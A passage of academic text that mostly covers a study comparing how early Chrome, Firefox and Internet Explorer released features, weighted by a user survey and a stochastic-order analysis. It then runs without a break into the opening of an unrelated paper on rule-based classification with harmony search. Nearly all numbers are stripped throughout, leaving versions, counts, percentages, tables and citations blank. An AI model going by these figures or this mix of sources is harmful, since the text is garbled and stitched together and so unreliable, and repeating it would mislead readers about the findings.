through a web page via the keyboard adaptive address bar suggest webpages as you type an address or search keywords from your history or from a search engine full page zoom scales the whole page, including images and csss hardware acceleration allows the gpu to help the browser to speed up certain tasks that the gpu is more capable for incognito allows the user to browse the web with reduced identifiable trace (notably doesn’t allow cookies) reopen closed tabs reopen a recently closed tab full screen displays the page in full screen mode table : features not used in comparisons as they did not reflect differences between browsers. . listing of major features of modern browsers. . establishing the release date of each feature by each browser . identification of features that differentiate between the browsers . conducting an online survey of web users to assess the relative importance of the different features to end users . performing a statistical analysis of the relative importance (according to the survey) of features that each browser released earlier or later than other browsers. the following subsections provide details regarding these steps. . . feature selection we identified features which in our opinion represent a modern browser. these features are listed in table and table . the release date of each feature in each browser was ascertained by the combination of reading release documentation and checking whether features exist in the different versions we downloaded. 
the third step, namely identifying features that differentiate between the browsers, is based on the release dates. the reason is that features only differentiate between browsers if they are released at different times. as # feature explanation add-ons manager allows you to disable/remove previously installed add-ons download manager allows you to view/pause current downloads and view previously downloaded files auto-updater silently & automatically updates the browser if there’s a new version caret navigation allows you to navigate through a site using the arrow keys (just like in any document processor e.g. in microsoft word) pinned sites allows you to have faster access to your favorite sites like facebook or your email provider sync allows you to sync you favorites/preferences/saved passwords etc. through computers and platforms session restore (automatically) upon a crash, the browser will restore the sites you were surfing before the crash crash/security protection allows you to continue browsing although a site/plugin crashed or hanged malware protection enables the browser to warn and block suspicious sites that are known to be harmful outdated plugin detection allows the browser to detect if a plugin has become incompatible/vulnerable with the browser’s version do not track allows the browser to request sites not to track the browsing themes allows you to personalize the browser appearance by changing the skin experimental features allows you to try experimental features in the browsers that aren’t turned on by default multiple users allows you to have multiple profiles (different bookmarks/saved passwords/history) on the same computer user apps allows you to install applications that will run in the browser (like games or other applications) developer tools allows you to examine a site’s interaction with the browser personalized new tab allows you to see your most visited sites upon the launch of the browser (the first tab that is opened on launch of the browser) click-to-play disables the automatic launch of a plugin’s content. the user must explicitly click on the flash/applet in-order to load and play it print preview allows the user to view the page before printing it per-site security configuration allows you to control which sites will block popups/cookies/images/scripts/plug-ins etc. web translation allows the browser to translate a page automatically to a desired language spell checking marks misspelled input you typed and corrects it built-in pdf viewer allows the browser to open pdf files without any rd party plugins sandboxing a security concept that certain parts of the browser run individually with restricted privileges only rss reader allows the browser to know when a certain site, that supports rss, was updated. news feeds etc. table : selected features used in comparisons [arbitrary order]. figure : feature release margin example: the “personalized new tab” feature was released in chrome , internet explorer , and firefox (marked with arrows). chrome . was our starting point, features included in this version which had already been included also by the competing browsers were excluded from consideration, as they did not confer any competitive advantage to any browser in the context of our study. for example, this included multiple tab browsing. seven further features were excluded because they were released at about the same time by all three browsers, so they too did not confer any competitive advantage (table and see below). 
subsequently, the study was conducted based on the remaining features. these features are listed in table . note that the features are listed in a random order. . . feature release margins as the three browsers are developed by different organizations, the release dates of new versions are of course not coordinated. we therefore faced the challenge of defining what it means for one browser to release a feature ahead of another. we elected to use a conservative metric for this concept. we had already dated the release of each of the selected features in each browser (table ). we then developed a metric which states whether a certain browser released a feature ahead of a competitor by “a meaningful margin” and/or whether a certain browser lagged a competitor by “a meaningful margin”. a browser was awarded a “win” if it released a feature ahead of all its competitors, and a penalty or “loss” was given if a browser lagged all its competitors or did not released a certain feature at all. note that each feature can have a maximum of one “winner” and a maximum of one “loser”. if a feature had neither a “winner” nor a “loser” it was excluded from the study as no browser had a competitive advantage or disadvantage. “a meaningful margin” was defined as more than one release cycle, that is, when it took the competitors more than one version to include the feature after it was initially introduced. for example, “personalized new tab” was introduced in chrome . at the time the most recent versions of internet explorer and firefox were and , respectively. the feature was subsequently released in internet explorer and firefox , meaning that this was a meaningful margin. had the feature been released in internet explorer or firefox . it would not have counted as a meaningful margin, despite being later than chrome . furthermore, firefox lagged internet explorer in the release of the feature in a meaningful margin (figure ). so in this case chrome received a “win” and firefox received a “loss”. all the release versions and their identification as wins or losses are shown in the results in table . note that the definition of the release margin is based on releases of new versions, and not on absolute time. this definition gives an advantage to browsers that are released infrequently. for example, any innovations included in chrome versions to — a span of nearly two years — and included in internet explorer would not be considered to have a significant margin, because microsoft did not release any versions during all this time. consequently our results may be considered to be conservative. . . feature importance survey to assess the relative importance of the different features, we created an online survey that lists and explains these features. survey participants were asked to evaluate the importance of each feature relative to other listed features on a discrete scale of (least important) through (most important). the features were listed in the same random order as in table . the intended audience were people who spend many hours a day on the world wide web. the survey was published on reddit (sub-reddit /r/samplesize) [ ] and on cs facebook groups of the hebrew university and tel-aviv university in israel. people answered the survey, and the distribution of results is shown in table . the statistical analysis was performed on all of the participants. . 
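returning to the feature release margins defined above, the sketch below illustrates the "win"/"loss" bookkeeping under the more-than-one-release-cycle rule; the version numbers and the data layout are hypothetical and only meant to show the shape of the computation, not the study's actual release table:

```python
# "meaningful margin" sketch: a rival lagged if it needed more than one release
# cycle to ship the feature after it was introduced, or never shipped it at all.
def lags_by_meaningful_margin(rival_version_then, rival_release_version):
    if rival_release_version is None:            # the rival never released the feature
        return True
    return rival_release_version > rival_version_then + 1

# hypothetical record for one feature: the introducing browser plus, for each
# rival, (its current version at introduction time, the version that added it)
introducer = "chrome"
rivals = {
    "internet explorer": (9, 11),
    "firefox": (7, 13),
}

if all(lags_by_meaningful_margin(*versions) for versions in rivals.values()):
    print(f'{introducer} is awarded a "win" for this feature')
# symmetrically, a "loss" is given to the browser (if any) that lagged all of its
# competitors by a meaningful margin, or never released the feature at all
```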
statistical analysis procedure opinion surveys like the one we conducted are commonly analyzed by calculating the average score received by each entry, and considering these to be the averages of samples of different sizes and unknown variance. then a test such as welch’s t-test is used to check whether or not these averages are significantly different. however, such an approach suffers from a threat to construct validity, because averaging implicitly assumes that the scale is a proper interval scale, meaning that the difference between and is the same as between and , and , and and . but given that these numbers represent subjective levels of importance, this is not necessarily the case. moreover, different people may use the scale differently. therefore both the averaging and the statistical test are compromized. another problem with human users is that some of them are hard to please, and always use only the bottom part of the scale, while others are easy to please, and focus on the top part of the scale. to reduce this danger our survey participation instructions included the following: “for every feature please choose how important this particular feature is compared to other features in the survey. please try to use the full scale from ‘least important’ to ‘most important’ for the different features. you can change your marks as often as you wish before submitting.” and indeed, checking our data we found that most respondents actually used the full scale from to , with an average near . these findings imply that we do not need to perform adjustments to the data to compensate for potentially different behaviors [ ]. nevertheless, comparing average scores is still not justifiable. we therefore use an analysis method due to yakir and gilula, where brand a is judged to be superior to brand b if the distribution of opinions about a dominates the distribution of opinions about b in the stochastic order sense [ ]. note that in our case the “brands” are not microsoft, google, and mozilla, but rather the sets of features which represent the “wins” or “losses” of each browser. this will be clear in the results of subsection . . mathematically stochastic order is expressed as ∀s : fa(s) ≤ fb(s), where fa and fb are the cumulative distribution functions of the opinions regarding a and b, respectively. graphically, the plot of fa is lower and to the right of the plot of fb, and it accumulates more slowly. in simple terms this means that for each level of opinion to the probability that a receives a score of at least this level is higher than the probability that b receives such a score. however, in many cases one distribution does not dominate the other (and their graphs cross each other). it is then necessary to adjust the data by grouping brands and/or score levels together until dominance is achieved [ , , , ]. in more detail, the analysis procedure is as follows [ ]: . identify subsets of homogeneous brands. ideally, for all pairs of brands, the distribution of scores of one brand will dominate the distribution of scores of the other brand. this will induce a full order on the brands. but in reality there may be certain subsets of brands that are incomparable, and do not dominate each other. these subsets need to be identified, and the ranking will then be between subsets instead of between individual brands. the subsets are found by an agglomerative single-link clustering algorithm. initially all pairs of individual brands are compared, and the chi-squared statistics computed. 
if the minimum statistic value obtained is below a predefined critical value, the two distributions are considered the same and the brands are combined into a joint subset. in subsequent steps, when subsets are being considered, the maximal statistic among all pairs (where one brand comes from the first subset and the other brand from the second subset) is compared to the critical value. the suggested critical value is the upper α percentile from the chi-square distribution with j − degrees of freedom, where j is the number of score levels in the distribution (in our case, ) and α = . (or another value chosen by the analyst). a chi-square-based test is then applied to test whether the obtained partitioning is significant, as described in [ ]. the result of this step is then one or more subsets of brands, which are heterogeneous relative to each other, but the brands within each subset are homogeneous. . find the widest collapsed scale. even when brands (or subsets of brands) have heterogeneous distributions of scores, the distributions may not dominate each other in the stochastic order sense. this happens if the distributions cross each other. however, it is always possible to create a dominance relationship by collapsing adjacent scores and thereby reducing the fidelity of the distributions. the problem is that collapsing can be done in many different ways, and the selected collapsing may affect the resulting dominance order. we therefore need to define which collapsing is better. the suggested approach is to strive for minimal loss of information, in the sense of preserving as many of the original scores as possible. hence we are looking for the widest collapsed scale that nevertheless leads to dominance. technically, the procedure is as follows. given all the subsets of brands, we consider all possible orders of these subsets. for each such order we find the collapsing that leads to dominance in this order (if such a collapsing exists). the order that is supported by the widest collapsing is then selected. this implies using the collapsing which retains the highest number of distinct scores. . note the stochastic order between the subsets of brands. at this point a well-defined stochastic order is guaranteed to exist. this order is the result of the analysis. . verify statistical significance. collapsing score levels leads to loss of information relative to the original data. a chi-square-based test is used to demonstrate that the loss is not significant, and therefore the results will still reflect the original data. for details see [ ]. in our case the brands are the features of the browsers. but we don’t really care about ranking the individual features. rather, we want to rank sets of features. for example, we can take the set of features that were chrome “wins”, and compare it to the set of features that were chrome “losses”. if the first set turns out to be more important to users, then this testifies that chrome project managers chose wisely and invested their resources in prioritizing the more important features first. to perform these calculations we used the insight for r v . software package which implements this ap- proach . given the adjusted (collapsed) data, we also calculate the polarity index. the polarity index is the ratio of users who considered features important (levels and ) to the rest (levels to ). 
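a small sketch of the stochastic-order check and of the polarity index, applied to two hypothetical distributions of survey answers (the five-level scale used here is only an assumption for illustration):

```python
# dominance and polarity on hypothetical answer counts, least to most important
import numpy as np

def dominates(a_counts, b_counts):
    """a dominates b if f_a(s) <= f_b(s) at every score level s."""
    fa = np.cumsum(a_counts) / np.sum(a_counts)
    fb = np.cumsum(b_counts) / np.sum(b_counts)
    return bool(np.all(fa <= fb))

def polarity_index(counts):
    """ratio of answers in the two top levels to answers in the remaining levels."""
    counts = np.asarray(counts, dtype=float)
    return counts[-2:].sum() / counts[:-2].sum()

set_a = [10, 20, 30, 25, 15]   # hypothetical counts of answers for feature set a
set_b = [18, 26, 28, 18, 10]   # hypothetical counts of answers for feature set b
print(dominates(set_a, set_b))                    # True: a accumulates more slowly than b
print(polarity_index(set_a), polarity_index(set_b))
```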
a polarity index less than indicates that the balance is skewed towards not important, while a polarity index higher than indicates that user opinion is skewed towards most important. unlike average scores, the polarity index has a direct quantitative meaning and therefore the indexes of different brands can be compared to each other. . results . . early release of features in order to analyze which browser released features earlier than its competitors we identified the “wins” and “losses” of each browser, as indicated in table . our results show that chrome received a “win” in features and firefox in features. in contrast, internet explorer did not receive any “wins”, and features did not have a “winner”. chrome received a “loss” in features, firefox in features, and internet explorer in features. here only one feature was not ascribed as a “loss” to any of the browsers (the “web translation” feature). these results already show that chrome tended to release new features ahead of the other browsers, with firefox being a very close second. internet explorer lagged far behind both of them, as it did not release any feature ahead of the competition and it was the last to release half of the features in the study. the software and statistics advice were kindly provided by professor zvi gilula. # feature feature release version survey results explorer firefox chrome add-ons manager pre pre l download manager l pre auto-updater l w caret navigation pre none l pinned sites l sync l session restore (automatically) l pre crash/security protection l malware protection l outdated plugin detection none l w do not track l themes none l pre w experimental features none l pre w multiple users none l pre w apps none l w developer tools l personalized new tab l w click-to-play none l w print preview pre pre l per-site security configuration l w web translation none none w spell checking l pre built-in pdf viewer none l w sandboxing pre none l rss reader pre none l table : feature release versions and survey results. w and l denote wins and losses, respectively. . . importance comparisons mere counting of “wins” and “losses” as done above does not indicate whether the features released early by chrome were indeed the more important ones. we therefore conducted an analysis of importance by comparing the distributions of importance scores given to the sets of features that were “wins” and “losses”. specifically, we performed an analysis of the “wins” of different browsers, an analysis of their “losses”, and a specific analysis of the “wins” versus the “losses” of chrome. wins the results of comparing the user opinions regarding the feature sets where each browser “won” is shown in table . a stochastic order of the response levels was present without any adjustments, with chrome ranked first and firefox second. since internet explorer did not have any “wins” it was ranked last. the polarity index of chrome and firefox were . and . , respectively. while both are smaller than , the features in which chrome received a “win” were still more important to the end user, since the polarity index was higher. the direct quantitative meaning is that for chrome users considered the “winning” features to be important of the time, whereas for firefox they considered them to be important only about of the time. losses given limited resources the developers of a browser cannot do everything at once, so the implementation of select features must be delayed. 
under such circumstances it is best to delay those features that will not be missed by many users, namely those that are considered less important. therefore, a lower ranking and a lower polarity index are favorable when comparing feature sets which are "losses". table : comparison between chrome and firefox "wins" (columns: rank, browser, no. of wins, importance score distribution, polarity index; internet explorer had no "wins"). table : comparison between chrome and firefox/internet explorer "losses" (columns: rank, browser, no. of losses, importance score distribution, polarity index; note that in this case being ranked lower is better, and the polarity index is calculated differently than in other cases because scores and were collapsed). the "loss" score distributions of firefox and internet explorer showed the same trends and could not be distinguished one from the other, so they were clustered together. in order to achieve dominance the ranking algorithm collapsed importance score levels and (table ). the result after these adjustments was that firefox and internet explorer were ranked on top and chrome was ranked lower. this means that the features in which firefox and internet explorer received a "loss" were more important to the end users. however, it should be noted that the differences in the distributions were actually very small, so this difference is most probably meaningless. the polarity index could not be calculated in the regular way due to the unification of levels and . the results given in the table are therefore the ratio of levels to to levels and , making them higher than in other comparisons. they are close to each other, but chrome is still a bit lower, which is better in this case. chrome wins and losses finally, we compared the features that chrome "won" with those that it "lost". in order to achieve a stochastic order the algorithm collapsed levels and together. interestingly, the "losses" won, meaning that they were considered more important (table ). table : comparison between chrome "wins" and "losses" (columns: rank, class, no. of features, importance score distribution, polarity index). the polarity index of the "wins" and the "losses" were . and . , respectively, meaning the features which chrome released ahead of its rivals were considered important to the users about % of the time, whereas those in which it lagged behind were considered important nearly % of the time. thus the prioritization used in developing chrome was better than that of its rivals (as shown in the two previous analyses), but it was far from perfect. discussion . summary of results we tested the performance of the three dominant browsers, chrome, firefox, and internet explorer, and to a lesser degree also the opera browser, using a wide set of commonly used benchmarks and across a long period of time. table : summary of benchmark results.
sunspider: chrome was best through , now internet explorer is significantly better.
browsermark . : chrome is best, explorer worst.
canvasmark: chrome is relatively good but inconsistent, firefox worst.
peacekeeper: chrome is significantly better.
start-up times: initially chrome was better but now firefox is better, explorer has deteriorated.
html compliance: chrome is better, explorer worst.
css test: chrome is better.
browserscope security: chrome is better, firefox worst.
the results, presented in subsection . through subsection . and summarized in table , show that chrome
generally had an advantage over its competitors, both in terms of performance and in terms of conformance with standards. more specifically, chrome achieved better results throughout in five of the tests: browsermark . , peace- keeper, html compliance, css test, and browserscope security. firefox achieved better results only in the start-up times test, and that only towards the end of the study period. interestingly, chrome start-up times results may indicate that chrome suffers from a feature creep impacting its start-up times. internet explorer achieved better results only in sunspider, in the second half of the study period. moreover, chrome was not worse than both competing browsers in any of the benchmarks, while firefox and internet explorer were each the worst browser in two cases. in addition we compared the release dates and importance of specific features, as described in subsection . . eleven features had a “winner”, meaning that they were released by one browser ahead of the others by a meaningful margin. all but one also had a “loser”, that is a browser that lagged behind by a significant margin. the relatively low fraction of features that had a “winner” (and the fact that features were excluded from the study because they did not have a “winner” nor a “loser”) indicates that the development of each browser is not isolated from its rivals. as a result, some features are released at about the same time by two or even all three browsers. on the other hand, some browsers still managed to release a fair number of innovative features: chrome and firefox received and “wins”, respectively. internet explorer on the other hand did not receive any “wins” and had the most “losses”, . chrome and firefox had and “losses”, respectively. although chrome and firefox received similar numbers of “wins” the feature importance survey showed that features in which chrome “won” were more important to the users than features in which firefox “won”. likewise, features in which chrome “lost” were less important to users than the features in which firefox and internet explorer had “lost”, but in the case of losses the difference was marginal. interestingly, chrome “losses” were actually more important to users than its “wins”. ideally a browser should release the most important features to users first, and in case it has to lag in the release of certain features they should be of less importance to users. the results indicate that chrome project managers were somewhat better at releasing important features first than the project managers of competing browsers. this means that they generally made better choices than their rivals. however, they did not manage to focus on only the important features, and when they lagged in feature release, these features were sometimes actually more important to users. . implications for software development while not the focus of our study, our results can be used to gleam some insights into basic questions in large-scale software development. this is based on the fact that the three main browsers were developed in rather different ways. however, this is somewhat speculative, and additional work is needed. one major question is the comparison of open source and proprietary software development. our results regarding firefox and internet explorer provide some evidence for the potential superiority of large-scale open- source projects. 
up to firefox was quickly gaining market share at the expense of internet explorer, and our benchmark results indicate that it appears to have had superior performance for most of them (this conclusion is restricted, however, by the fact that we did not measure internet explorer and and the early versions of firefox). it also appears to have been more innovative, as reflected by having some “wins” in early introduction of new features, and much less “losses” than internet explorer. this is an important result, as it demonstrates that a large open-source project can in fact prioritize features better than a competing product developed in-house by a leading software firm. of course this does not imply that this is always the case, but it provides an important case study as an instance. however, in later years chrome came to overshadow firefox. to the degree that chrome is an in-house product this implies that large company projects can also be better than open-source ones. the conclusion would then be that the main factor is not the project management style but rather the companies involved, in this case microsoft as opposed to google. but such a conclusion is tainted by the fact that chrome is closely related to the open-source chromium project. so maybe the most important factor is the various project managers and contributors. this calls for further investigation as noted in the future work section below. another sometimes contentious aspect of software development is the use of agile methodologies with a rapid release cycle as opposed to heavier plan-based methodologies with large-scale infrequent releases. tabulating the browser version release dates indicates that chrome and firefox transitioned to rapid development methods, releasing a new version every - weeks (figure ). this meant that there were more releases and each release contained fewer new features, leading to more focus in the work on each new release. at the same time, with rapid releases the development teams could respond more quickly to their competitors’ released features which they considered to be important, and also respond quickly to user feedback and requests. microsoft retained the traditional slow release cycle for internet explorer, releasing only versions during the years of the study, compared with released versions of chrome. this may have contributed to internet explorer’s downfall. . threats to validity various threats to validity have been mentioned in previous sections. here we note them together and expand on them. the first threat relates to the assessment that chrome is the dominant browser, as shown in figure . first, as noted, this data comes from statcounter, and other counting services may reach different conclusions. second, we focused on desktop systems, and the picture may be different on other platforms such as mobile. to address these concerns we checked other counting services and platforms, and found that most of them indicate that chrome is of growing importance and often dominant. the most prominent dissenter is netmarketshare.com, which claims that internet explorer is still the dominant browser worldwide by a large margin ( % for explorer vs. % for chrome in january ) [ ]. the difference is probably due to a much smaller sample ( thousand web sites as opposed to million for statcounter) and differences in methodology, including an attempt to count unique users per day and to weight countries by their total traffic. 
we believe that the statcounter data is more reliable, and specifically prefer to count activity and not users. the issue of the mobile market is mentioned below in the future work section. another threat to the validity of the work reported so far is its focus on purely technical aspects of browsers. we did not check the marketing aspect of the browsers, hence, we cannot separate the technical superiority from the brand name. for example, according to [ ] an important aspect of chrome’s rise was “the great promotional efforts produced by google” in the shape of promotional videos released on the web. examples of such videos are given, including the “chrome speed tests” video released in may that went viral; at this time chrome was just beginning its rise in market share, and the video may have contributed to its momentum. all videos were released by april , when chrome had already overtaken firefox but was still second to internet explorer. additional work from a marketing perspective is needed to alleviate this concern. a third threat is that we compared chrome’s performance with only two main rivals (internet explorer and firefox) and partially also with a third (opera). there are many other browsers as well, and maybe chrome is not better than all of them. the focus on this set of contenders is justified by the fact that together with chrome they account for well over % of the desktop browsers market. however, if any of the smaller browsers is indeed superior to chrome and the others, this would testify to the importance of branding and marketing relative to technical considerations. using existing benchmarks is also a threat to validity, especially since their documentation is sometimes short on details of exactly what they measure and how. however, it should be noted that benchmarking browsers (and other system types for that matter) is not trivial. therefore we preferred to rely on prominent benchmarks that have established themselves over the years instead of trying to devise our own — and risk threats to validity that result from our inexperience in such benchmarking. that being said, it should be noted that the benchmarks do not test all possible aspects of browser technology. for example, it is possible to conduct a more detailed study of compatibility issues [ ] to try and quantify the problems that may occur with each browser. finally, a possible threat to validity concerning the introduction of new features is that such features could be introduced in plugins before being integrated into the browser core. this would cause the dates of the releases which first included these features to be misleading. however, we do not consider this to be a serious threat as even the most popular plugins are used by only a small fraction of users. . future work a drawback of the current work is its focus on the desktop market. obviously examining competing browsers in the mobile market would also be interesting. using statcounter.com data, it turns out that chrome is now also the leading browser on mobile platforms [ ]. however, its rise started much later, and accelerated considerably only in , eventually surpassing both the android and safari browsers. it would be interesting to repeat our measurements with multiple releases of these browsers, and perhaps also with uc browser, which is the fourth- ranked browser and also seems to be gaining market share, especially in emerging markets. 
another potentially interesting line of study is to try and compare the relative importance of technical considerations, marketing campaigns and practices, and brand name. it is widely accepted that internet explorer gained its market dominance by being bundled with the windows operating system, and it is reasonable to assume that the strength of uc browser in emerging markets is related to the strength of the company which developed it, the chinese mobile internet company uc mobile. chrome most probably benefited from the google brand name and from google's marketing campaign. but how to separate these effects remains an open question. in the late s the browser war between internet explorer and mozilla (later firefox) was portrayed as a race between proprietary software and open source software. chrome is a unique combination of both. it was initially developed within google, but was then largely turned into an open source project. an open question is whether it was really turned over to the open source community, or remains largely under google control, both in terms of code contributions and in terms of management. thus an interesting direction for further work is to dissect the sources of advances made in chrome (or rather chromium), and to see how many of them can be attributed to developers outside google. conclusions we tested the technical performance of the three major browsers (chrome, firefox, and internet explorer) and compared the release times of features. overall it seems that all three browsers became better over time, as most of the benchmarks that were examined showed a clear improvement trend, and all the browsers evolved and received better results. it is also apparent that versions were released more frequently over the years (especially for chrome and firefox). in conclusion, the cumulative evidence we have collected indicates that chrome's rise to dominance is indeed consistent with technical superiority over its rivals and with insightful management of feature selection. however, we still cannot say that it is the result of technical superiority alone, as marketing and the google brand probably also played an important role. studying the marketing campaign may well be a worthwhile effort. acknowledgments many thanks to zvi gilula for his explanations about statistical procedures and for providing the software used in the analysis. this work is a greatly extended version of a class project done with kobi atiya, who contributed to the conceptual design and initial results. the opera measurements were performed by amir massarwi. references
[ ] url: http://www.w .org/people/berners-lee/worldwideweb.html.
[ ] cached version of http://www.netscape.com/newsref/pr/newsrelease .html. url: http://xml.coverpages.org/netscapecode .html.
[ ] url: https://web.archive.org/web/ /http://weblogs.mozillazine.org/ben/archives/ .html.
[ ] url: http://www-archive.mozilla.org/roadmap/roadmap- -apr- .html.
[ ] url: http://website-archive.mozilla.org/www.mozilla.org/firefox_releasenotes/en-us/firefox/releases/ . .html.
[ ] url: http://mozilla.github.io/process-releases/draft/development_overview/.
[ ] url: http://blog.mozilla.org/channels/ / / /every-six-weeks/.
[ ] url: http://blog.chromium.org/ / /welcome-to-chromium_ .html.
[ ] url: https://code.google.com/p/chromium/wiki/chromiumbrowservsgooglechrome.
[ ] url: http://blog.chromium.org/ / /release-early-release-often.html.
[ ] url: http://gs.statcounter.com/.
[ ] url: http://www.w schools.com/browsers/browsers_stats.asp.
[ ] url: http://netmarketshare.com/.
[ ] url: https://www.webkit.org/perf/sunspider/versions.html.
[ ] url: https://www.webkit.org/blog/ /announcing-sunspider- - /.
[ ] url: https://www.webkit.org/perf/sunspider- . . /sunspider- . . /driver.html.
[ ] url: https://www.webkit.org/perf/sunspider- . . /sunspider- . . /driver.html.
[ ] url: http://blogs.msdn.com/b/ie/archive/ / / /html -and-real-world-site-performance-seventh-ie -platform-preview-available-for-developers.aspx.
[ ] url: http://digitizor.com/ / / /internet-explorer- -caught-cheating-in-sunspider-benchmark/.
[ ] url: http://www.kevs d.co.uk/dev/canvasmark/.
[ ] url: http://peacekeeper.futuremark.com/faq.action.
[ ] url: http://html test.com/about.html.
[ ] url: http://css test.com/.
[ ] url: http://www.browserscope.org/security/about.
[ ] url: https://dev.opera.com/blog/ -million-users-and-move-to-webkit/.
[ ] url: http://www.reddit.com/r/samplesize/.
[ ] url: http://www.makeuseof.com/tag/ -awesome-google-chrome-promo-videos/.
[ ] hal berghel. "who won the mosaic war?" in: comm. acm . ( ), pp. – .
[ ] shauvik roy chaudhary, mukul r. prasad, and alessandro orso. "x-pert: accurate identification of cross-browser issues in web applications". in: intl. conf. software engineering ( ), pp. – . doi: . /icse. . .
[ ] zvi gilula. "grouping and association in contingency tables: an exploratory canonical correlation approach". in: j. am. stat. assoc. . ( ), pp. – . doi: . / .
[ ] zvi gilula and abba m. krieger. "collapsed two-way contingency tables and the chi-square reduction principle". in: j. r. stat. soc. b (methodological) . ( ), pp. – .
[ ] zvi gilula, abba m. krieger, and yaakov ritov. "ordinal association in contingency tables: some interpretive aspects". in: j. am. stat. assoc. . ( ), pp. – .
[ ] ted g. lewis. microsoft rising. ieee computer society press, .
[ ] patrick meenan. "how fast is your website?" in: comm. acm . ( ), pp. – . doi: . / . .
[ ] barry phillips. "designers: the browser war casualties". in: computer . ( ), pp. – . url: http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber= .
[ ] gregor richards, andreas gal, brendan eich, and jan vitek. "automated construction of javascript benchmarks". in: acm sigplan notices . ( ), pp. – . url: http://dl.acm.org/citation.cfm?id= .
[ ] ya'acov ritov and zvi gilula. "analysis of contingency tables by correspondence models subject to order constraints". in: j. am. stat. assoc. . ( ), pp. – . doi: . / . url: http://www.tandfonline.com/doi/abs/ . / . . .
[ ] peter e. rossi, zvi gilula, and greg m. allenby. "overcoming scale usage heterogeneity: a bayesian hierarchical approach". in: j. am. stat. assoc. . ( ), pp. – . doi: . / . url: http://www.tandfonline.com/doi/abs/ . / .
[ ] steve sounders. "high-performance web sites". in: comm. acm . ( ), pp. – . doi: . / . .
[ ] ronald j. vetter, chris spell, and charles ward. "mosaic and the world wide web". in: computer . ( ), pp. – . url: http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber= .
[ ] paul windrum. "leveraging technological externalities in complex technologies: microsoft's exploitation of standards in the browser wars". in: research policy . ( ), pp. – . url: http://www.sciencedirect.com/science/article/pii/s .
[ ] benjamin yakir and zvi gilula. "an insightful comparison of brands on an arbitrary ordinal scale". in: j. market research soc. . ( ), pp. – .
[ ] david b yoffie and michael a cusumano. "judo strategy. the competitive dynamics of internet time." in: harvard business review . ( ), pp. – . url: http://europepmc.org/abstract/med/ .
submitted december accepted march published november corresponding author ramak ghavamizadeh meibodi, r-ghavami@sbu.ac.ir academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright hasanpour et al. distributed under creative commons cc-by . open access improving rule-based classification using harmony search hesam hasanpour, ramak ghavamizadeh meibodi and keivan navi department of computer science and engineering, shahid beheshti university, tehran, iran abstract classification and associative rule mining are two substantial areas in data mining. some scientists attempt to integrate these two fields into what are called rule-based classifiers. rule-based classifiers can play a very important role in applications such as fraud detection, medical diagnosis, etc. numerous previous studies have shown that this type of classifier achieves a higher classification accuracy than traditional classification algorithms. however, they still suffer from a fundamental limitation. many rule-based classifiers use various greedy techniques to prune redundant rules, which can lead to missing some important rules. another challenge that must be considered is related to the enormous set of mined rules, which results in high processing overhead. the consequence of these approaches is that the final selected rules may not be the globally best rules. these algorithms are not successful at exploiting the search space effectively in order to select the best subset of candidate rules. we merged the apriori algorithm, harmony search, and the classification-based association rules (cba) algorithm in order to build a rule-based classifier. we applied a modified version of the apriori algorithm with multiple minimum support for extracting useful rules for each class in the dataset. instead of using a large number of candidate rules, binary harmony search was utilized for selecting the best subset of rules that are appropriate for building a classification model. we applied the proposed method to seventeen benchmark datasets and compared its results with traditional association rule classification algorithms. the statistical results show that our proposed method outperformed other rule-based approaches. subjects artificial intelligence, data mining and machine learning keywords apriori algorithm, cba algorithm, harmony search introduction the availability of a huge amount of raw data has created an immense opportunity for knowledge discovery and data mining research to play an essential role in a wide range of applications such as industry, financial forecasting, weather forecasting and healthcare. classification is one of the most important areas in data mining and has been applied in many applications such as bioinformatics, fraud detection, loan risk prediction, medical diagnosis, weather prediction, customer segmentation, target marketing, text classification and engineering fault detection.
association rule mining (arm) is another popular and substantial technique in machine learning and data mining, introduced by agrawal, imieliński & swami ( ), which has since remained one of the most active research areas in machine learning and knowledge discovery. association rule mining finds interesting relationships among large sets of data items. association rules show attribute value conditions that occur frequently together in a given data set. association rules provide information of this type in the form of if-then statements. unlike the if-then rules of logic, association rules are intrinsically probabilistic and are computed from the data. arm is a powerful exploratory technique with a wide range of applications, including marketing policies, the medical domain (ilayaraja & meyyappan, ; shin et al., ), financial forecasting, credit fraud detection (sarno et al., ) and many other areas. there are a number of well-known association rule mining algorithms that are accessible to researchers (agrawal, imieliński & swami, ; burdick, calimlim & gehrke, ; scheffer, a). there is some evidence that integrating classification and association rule mining can result in more accurate and efficient classification models than traditional classification algorithms (ma & liu, ). producing a concise and accurate classifier by utilizing association rule mining is an attractive domain for data mining and machine learning researchers. a typical associative classification system is constructed in two stages: . discovering all the association rules inherent in a database. . selecting a small set of relevant association rules to construct a classifier. in the first step, some algorithms use the apriori algorithm for rule generation, while others use approaches such as foil (first order inductive learner). mazid, ali & tickle ( ) compared rule-based classification and association rule mining algorithms in terms of their classification performance and computational complexity. they concluded that apriori is a better choice for the rule-based mining task in terms of accuracy and computational complexity. usually a lot of rules are generated in the first step, and the main issue in the second step is how to efficiently find a small number of high-quality rules and how to generate a more accurate classifier. it must be noted that some researchers focus on the first step and try to find a minimal class association rule set (li, shen & topor, ), but our focus is on the second step. traditional algorithms use greedy approaches for selecting a small subset of the generated rules for building a classifier. with this approach, the selected rules are not necessarily the best subset of possible rules. another challenge is that the resulting rules are biased toward prevalent classes, so classifying rare instances is a major problem. consequently, test samples belonging to the small classes are misclassified as prevalent classes (chen, hsu & hsu, ; sun, wong & kamel, ).
sometimes rules with low support and very high confidence are effective in identifying rare events. in this paper, we present an association rule-based classification method to obtain an accurate and compact rule-based classifier. we used the apriori algorithm for rule generation and harmony search for selecting the best subset of rules that can build a classifier. the plan of this paper is as follows: first, we present the necessary background related to rule-based classification. in the next section, we describe the proposed method. the results section presents the induced results and, finally, the discussion section concludes the study. preliminaries apriori algorithm and interesting measures apriori is a standard and well-known basic algorithm in association rule mining that is used for mining frequent itemsets in a set of transactions. it was first introduced by agrawal and srikant (agrawal, imieliński & swami, ). apriori-c is another apriori-based algorithm that derives rules according to the minimal confidence and minimal support parameters of a rule (jovanoski & lavrač, ). predictive apriori (scheffer, b) is another algorithm motivated by apriori; unlike the confidence-related focus of apriori, it tries to maximize the expected accuracy of an association rule on unseen data. while apriori sorts the rules based on confidence only, predictive apriori considers both the confidence and the support when ranking the rules. nahar et al. considered three rule generation algorithms (apriori, predictive apriori and tertius) for extracting the meaningful factors for particular types of cancer (nahar et al., ) and heart disease (nahar et al., ). their experimental results showed that apriori is the most beneficial association rule mining algorithm. 